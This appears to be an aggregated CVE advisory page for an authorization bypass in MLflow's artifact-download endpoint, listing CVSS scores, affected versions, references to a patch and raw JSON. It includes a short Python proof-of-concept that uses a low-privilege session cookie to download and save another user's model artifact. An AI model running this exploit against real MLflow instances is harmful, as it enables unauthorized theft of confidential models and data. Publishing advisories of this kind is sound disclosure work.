Security Vulnerability Report
CVE-2026-33866 CVSS 4.3 MEDIUM

CVE-2026-33866

Published: 2026-04-07 13:16:47
Last Modified: 2026-04-20 18:45:17

Description

MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access-control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access. This issue affects MLflow versions through 3.10.1.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* - VULNERABLE
MLflow <= 3.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target MLflow instance URL
target_host = "http://target-mlflow-server:5000"

# The vulnerable AJAX endpoint for downloading artifacts
endpoint = "/ajax-api/2.0/mlflow/artifacts/download"

# Attacker's low-privilege session cookie (obtained via login)
attacker_cookie = "mlflow-session-cookie=low_priv_user_token"

# Headers including the session
headers = {
    "Cookie": attacker_cookie,
    "User-Agent": "Mozilla/5.0"
}

# Parameters specifying the unauthorized resource to download
# run_id: The ID of the experiment/model the attacker should not access
# path: The specific file within the artifacts
params = {
    "run_id": "sensitive_run_id_uuid",
    "path": "model/data.pkl"
}

# Send the GET request to exploit the bypass
response = requests.get(target_host + endpoint, headers=headers, params=params)

if response.status_code == 200:
    print("[+] Exploit successful! Downloaded artifact.")
    # Save the stolen artifact
    with open("stolen_artifact.pkl", "wb") as f:
        f.write(response.content)
else:
    print(f"[-] Failed to download. Status: {response.status_code}")

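References

https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors (Exploit, Third Party Advisory)
https://cert.pl/en/posts/2026/04/CVE-2026-33865/ (Third Party Advisory)
https://github.com/mlflow/mlflow/pull/21708 (Issue Tracking, Patch)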

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33866", "sourceIdentifier": "[email protected]", "published": "2026-04-07T13:16:47.000", "lastModified": "2026-04-20T18:45:16.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access‑control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access.\n\n \nThis issue affects MLflow version through 3.10.1"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.10.1", "matchCriteriaId": "C1C49CD5-5BB0-422B-9A71-5A6832DF6713"}]}]}], "references": [{"url": "https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://cert.pl/en/posts/2026/04/CVE-2026-33865/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/mlflow/mlflow/pull/21708", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}